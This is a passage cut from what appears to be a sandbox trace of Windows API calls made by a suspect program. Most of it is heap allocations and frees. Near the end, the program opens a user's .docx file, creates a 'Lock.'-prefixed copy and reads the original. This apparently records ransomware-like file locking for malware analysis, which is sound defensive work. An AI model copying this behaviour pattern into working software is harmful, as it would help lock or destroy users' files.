hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0221.525] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0221.526] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 1 [0221.526] TranslateMessage (lpMsg=0x8cf3b8) returned 0 [0221.526] DispatchMessageW (lpMsg=0x8cf3b8) returned 0x0 [0221.526] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0221.526] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0221.526] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0221.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0221.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0221.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0221.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0221.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0221.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0221.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0221.527] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0221.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0221.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0221.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0221.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0221.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0221.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0221.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0221.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0221.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0221.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0221.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0221.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0221.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0221.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0221.531] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/3P0loyjD.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\3p0loyjd.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0221.531] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.531] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0221.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0221.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0221.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0221.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0221.532] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0221.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0221.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0221.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x3be0e78 [0221.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0221.533] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0221.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0e78 | out: hHeap=0x970000) returned 1 [0221.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14818 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0221.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0221.533] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.3P0loyjD.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.3p0loyjd.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0221.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0221.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0221.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0221.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0221.534] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0221.535] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0221.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0221.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0221.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe54020 [0221.536] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0221.536] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0xca26, lpOverlapped=0x0) returned 1 [0221.539] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04810, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04810*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0221.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0221.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xca26) returned 0x2f24820 [0221.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe54020 | out: hHeap=0x970000) returned 1 [0221.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0221.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0221.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0221.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0221.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0221.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 